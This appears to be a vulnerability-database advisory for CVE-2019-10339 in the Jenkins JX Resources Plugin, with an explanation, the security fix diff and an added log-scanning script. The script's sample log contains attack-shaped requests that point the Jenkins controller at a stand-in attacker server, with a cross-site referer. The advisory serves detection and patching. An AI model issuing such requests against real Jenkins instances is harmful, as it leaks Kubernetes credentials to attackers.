VYPR
Moderate severity · NVD Advisory · Published Jun 11, 2019 · Updated Aug 4, 2024

CVE-2019-10339

Description

Missing permission check in Jenkins JX Resources Plugin 1.0.36 and earlier allows users with Overall/Read to connect to an attacker-controlled Kubernetes server, potentially leaking credentials.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

The missing permission check is in GlobalPluginConfiguration#doValidateClient, the form-validation method behind the plugin's global configuration page. Before 1.0.37 the method did not check the caller's authorization, so any user with Overall/Read could invoke it and have the Jenkins controller open a connection to whatever Kubernetes server URL and namespace were passed as query parameters [1][2].

Exploitation requires only Overall/Read on a Jenkins instance running an affected version. Because the method also accepted GET requests and carried no CSRF protection, it could additionally be triggered cross-site on behalf of a victim who was logged in to Jenkins [2]. In either case the attacker supplies a Kubernetes server URL they control, and the controller connects to it [1][2].

The Kubernetes client authenticates to whatever server it is pointed at, so the credentials the controller would present to that server, such as a service account token, are handed to the attacker [2]. Those credentials can then be replayed against the Kubernetes clusters the plugin is configured for [2].

The fix, released in 1.0.37, adds Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER) as the first statement of doValidateClient and annotates the method with @RequirePOST, so only administrators can trigger the connection and only via POST, which closes the CSRF route [2][3][4]. Upgrade to 1.0.37 or later; until then the endpoint is reachable by every user with Overall/Read.

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
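The detection side of the behaviour described above, as an added example that is not code from the advisory, the plugin, or its references: a Python scan over Jenkins HTTP access log lines in NCSA combined format that flags calls to the validateClient form-validation endpoint which point the controller at an unexpected Kubernetes server, arrive by GET rather than POST, or carry a cross-site Referer. The endpoint path is an assumption derived from Jenkins' descriptorByName/<class>/<method> convention for Descriptor form validation and the class name in the fix commit; the allowed API server, the Jenkins origin, and the log lines are constructed for the example.

```python
"""Flag suspicious calls to JX Resources Plugin's validateClient endpoint in
Jenkins access logs. Added example; not code from the advisory or the plugin."""
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: Jenkins serves Descriptor form-validation methods at
# descriptorByName/<FQCN>/<method>, so doValidateClient lives here. The FQCN is
# taken from the fix commit's source path; the URL mapping is not on the page.
VALIDATE_PATH = ("/descriptorByName/org.jenkinsci.plugins.jx.resources."
                 "GlobalPluginConfiguration/validateClient")

# Hypothetical: the only API server this controller should ever be pointed at.
ALLOWED_SERVERS = {"https://kubernetes.default.svc"}
# Hypothetical origin of the Jenkins UI; real validation clicks come from its /configure page.
JENKINS_ORIGIN = "https://jenkins.example.com"

# NCSA combined format (what Jetty's NCSARequestLog writes); Referer/User-Agent are optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "[^"]*")?'
)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it is not NCSA-shaped."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["target"])
    entry["path"] = url.path
    entry["query"] = parse_qs(url.query)  # percent-decodes server=https%3A%2F%2F...
    return entry


def classify(entry):
    """Findings for an entry that hits validateClient; None if it hits something else."""
    # endswith() tolerates a context path such as /jenkins in front of the Stapler path.
    if entry is None or not entry["path"].endswith(VALIDATE_PATH):
        return None
    findings = []
    server = entry["query"].get("server", [""])[0]
    if server not in ALLOWED_SERVERS:
        findings.append("unexpected-server")   # controller told to connect elsewhere
    if entry["method"] != "POST":
        findings.append("non-post")            # 1.0.36 accepted GET; 1.0.37 requires POST
    referer = entry["referer"]
    if referer and not referer.startswith(JENKINS_ORIGIN + "/"):
        findings.append("cross-site-referer")  # shape of a CSRF-triggered call
    if entry["status"] in ("403", "405"):
        findings.append("rejected")            # permission denied / method not allowed
    return findings


def scan(lines):
    """(user, status, server, findings) for every line that touches validateClient."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        findings = classify(entry)
        if findings is not None:
            server = entry["query"].get("server", [""])[0]
            hits.append((entry["user"], entry["status"], server, findings))
    return hits


# Constructed sample log: an admin's legitimate validation, a low-privilege user's
# GET pointed at an outside host (an unpatched instance answers 200), the same call
# against a patched instance (405), and unrelated traffic.
SAMPLE_LOG = [
    '10.0.0.5 - alice [11/Jun/2019:10:00:01 +0000] "POST ' + VALIDATE_PATH +
    '?server=https%3A%2F%2Fkubernetes.default.svc&namespace=jx HTTP/1.1" 200 142 '
    '"https://jenkins.example.com/configure" "Mozilla/5.0"',
    '198.51.100.23 - bob [11/Jun/2019:10:05:42 +0000] "GET ' + VALIDATE_PATH +
    '?server=https%3A%2F%2F203.0.113.7%3A6443&namespace=default HTTP/1.1" 200 98 '
    '"https://evil.example/csrf.html" "Mozilla/5.0"',
    '198.51.100.23 - bob [12/Jun/2019:09:12:07 +0000] "GET ' + VALIDATE_PATH +
    '?server=https%3A%2F%2F203.0.113.7%3A6443&namespace=default HTTP/1.1" 405 0 '
    '"https://evil.example/csrf.html" "Mozilla/5.0"',
    '10.0.0.9 - carol [12/Jun/2019:09:13:00 +0000] "GET /job/build-all/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Jenkins does not write an access log by default; the scan expects the NCSA log that Winstone/Jetty can be told to produce. The tell for an unpatched controller is the second sample line: a GET to validateClient from a non-administrator, pointed at an outside host, answered with 200. After the 1.0.37 fix the same request is rejected, which is why the third line carries the extra "rejected" finding.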

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: org.jenkins-ci.plugins:jx-resources (Maven)
Affected versions: < 1.0.37
Patched versions: 1.0.37

Patches (1)

Commit f0d9fb76230b

[SECURITY-1379] Secure the GlobalPluginConfiguration.doValidateClient web method

4 files changed · +17 −3
  • .mvn/extensions.xml+7 0 added
    @@ -0,0 +1,7 @@
    +<extensions xmlns="http://maven.apache.org/EXTENSIONS/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/EXTENSIONS/1.0.0 http://maven.apache.org/xsd/core-extensions-1.0.0.xsd">
    +  <extension>
    +    <groupId>io.jenkins.tools.incrementals</groupId>
    +    <artifactId>git-changelist-maven-extension</artifactId>
    +    <version>1.0-beta-7</version>
    +  </extension>
    +</extensions>
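Review bot: the git-changelist-maven-extension added here, together with the .mvn/maven.config profiles and the pom.xml parent and versioning changes in this same commit, is build tooling unrelated to SECURITY-1379; it makes what should be a three-line change to GlobalPluginConfiguration.java a four-file commit and complicates backporting the fix to a branch without incrementals support. Split the build-tooling changes into their own commit and keep this one to the @RequirePOST and checkPermission lines.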
    
  • .mvn/maven.config+2 0 added
    @@ -0,0 +1,2 @@
    +-Pconsume-incrementals
    +-Pmight-produce-incrementals
    
  • pom.xml+5 3 modified
    @@ -4,18 +4,20 @@
       <parent>
         <groupId>org.jenkins-ci.plugins</groupId>
         <artifactId>plugin</artifactId>
    -    <version>3.37</version>
    +    <version>3.43</version>
         <relativePath />
       </parent>
     
       <artifactId>jx-resources</artifactId>
    -  <version>1.0.37-SNAPSHOT</version>
    +  <version>${revision}${changelist}</version>
       <packaging>hpi</packaging>
       <name>JX Resources Plugin</name>
       <description>A plugin which uses Kubernetes Resources for storage of pipeline state</description>
       <url>https://wiki.jenkins.io/display/JENKINS/JX+Resources+Plugin</url>
     
       <properties>
    +    <revision>1.0.37</revision>
    +    <changelist>-SNAPSHOT</changelist>
         <jenkins.version>2.73.3</jenkins.version>
         <java.level>8</java.level>
         <kubernetes-client.version>3.1.10</kubernetes-client.version>
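Review bot: with <revision>1.0.37</revision> and <changelist>-SNAPSHOT</changelist>, this tree builds 1.0.37-SNAPSHOT unless the release run overrides changelist; confirm the published hpi carries the plain 1.0.37 version that the advisory's affected range (< 1.0.37) depends on. The parent bump from 3.37 to 3.43 leaves jenkins.version at 2.73.3, so nothing in this hunk raises the minimum Jenkins version needed to pick up the fix.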
    @@ -116,7 +118,7 @@
         <connection>scm:git:git://github.com/jenkinsci/jx-resources-plugin.git</connection>
         <developerConnection>scm:git:git@github.com:jenkinsci/jx-resources-plugin.git</developerConnection>
         <url>https://github.com/jenkinsci/jx-resources-plugin</url>
    -    <tag>HEAD</tag>
    +    <tag>${scmTag}</tag>
       </scm>
     
       <repositories>
    
  • src/main/java/org/jenkinsci/plugins/jx/resources/GlobalPluginConfiguration.java+3 0 modified
    @@ -18,6 +18,7 @@
     
     import static org.jenkinsci.plugins.jx.resources.KubernetesUtils.getNamespaceOrUseDefault;
     import org.kohsuke.stapler.QueryParameter;
    +import org.kohsuke.stapler.interceptor.RequirePOST;
     
     @Extension
     public class GlobalPluginConfiguration extends GlobalConfiguration {
    @@ -126,7 +127,9 @@ protected void doRun() throws Exception {
             }
         }
     
    +    @RequirePOST
         public FormValidation doValidateClient(@QueryParameter String server, @QueryParameter String namespace) {
    +        Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
             try {
                 KubernetesUtils.shutdownKubernetesClient();
                 KubernetesClient kubeClient = KubernetesUtils.getKubernetesClient(server, this);
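Review bot: checkPermission(Jenkins.ADMINISTER) is correctly the first statement, ahead of KubernetesUtils.shutdownKubernetesClient(), but the method still tears down the plugin's shared Kubernetes client as a side effect of a form-validation click; validate against a throwaway client built from the submitted server and namespace and leave the live one alone. Jenkins.getInstance() is the right call at the 2.73.3 baseline declared in pom.xml (Jenkins.get() only appeared in 2.98). @RequirePOST plus an ADMINISTER check is the standard Jenkins remedy for a validation endpoint that makes outbound connections; the validateClient URL now rejects GET with 405 and non-administrators with 403, which is what a scanner for this issue should look for.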
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (7)

News mentions (0)

No linked articles in our index yet.